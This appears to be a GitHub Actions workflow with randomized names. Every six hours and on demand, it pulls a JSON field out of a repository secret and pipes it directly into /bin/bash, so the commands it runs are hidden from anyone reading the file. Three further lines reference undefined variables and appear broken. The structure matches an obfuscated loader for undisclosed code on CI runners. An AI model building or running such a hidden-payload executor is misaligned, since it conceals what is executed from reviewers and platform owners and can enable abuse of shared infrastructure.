name: pangbaozheng5261
on:
  workflow_dispatch:
  schedule:
    - cron: '7 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: pangbaozheng5261
        env:
          se2200: ${{ secrets.se2200 }}
        run: |
          echo $se2200 | jq -r .kkvvc8 | /bin/bash
          echo $ptzws2610 | jq -r .qdrrg409 | /bin/bash
          echo $aikj5 | jq -r .bgkiy04313 | /bin/bash
          echo $dr5901 | jq -r .vn072 | /bin/bash

